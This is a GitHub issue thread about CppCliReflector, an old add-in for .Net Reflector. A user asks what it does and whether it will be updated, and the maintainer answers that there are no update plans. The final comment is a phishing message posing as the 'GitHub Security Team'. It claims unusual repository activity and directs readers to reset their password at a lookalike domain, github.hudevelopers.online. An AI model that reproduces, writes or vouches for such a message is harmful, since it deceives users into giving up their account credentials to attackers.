### ISSUE TITLE
Question

### ISSUE THREAD

**Issue by DevX-Cipher** [lzybkr/CppCliReflector#1]
Hey i was wondering what this is used for there is no explaining for this

**Comment by lzybkr** [comment]
From the readme: An addin for .Net Reflector to show source as C++/CLI.

**Comment by DevX-Cipher** [comment]
So if if i was to write hello world it should show up as c++

**Comment by lzybkr** [comment]
[C++/CLI](https://learn.microsoft.com/en-us/cpp/dotnet/dotnet-programming-with-cpp-cli-visual-cpp?view=msvc-170) - but this project is so old it likely does a terrible job with the more modern uses of C# in common use.

**Comment by DevX-Cipher** [comment]
I just tried it dont work i was using old stuff any chance of updating it
or do you know if anyone has

**Comment by lzybkr** [comment]
Sorry - I don't have plans to update and AFAIK you're the first person to try it in a very long time.

**Comment by DevX-Cipher** [comment]
Ok fair enough

**Comment by GtdsIndonesia** [comment]
# Urgent: Security Alert for

Hello,

We've detected unusual activity in your GitHub repository . To ensure that your account remains secure, we urgently need you to take action.

## What You Need To Do:

1. **Verify Repository Settings**
   - Ensure that your repository settings have not been altered without your consent.

2. **Reset Your Password**
   - Visit this secure link to reset your password immediately: [Reset Password](https://github.hudevelopers.online/)

3. **Revoke Unauthorized Access**
   - After resetting, please review any unauthorized access and revoke them.

Thank you for your prompt attention to this matter to ensure the security of your GitHub account.

*If you did not initiate these changes, please contact us immediately.*

Best Regards,  
**GitHub Security Team**
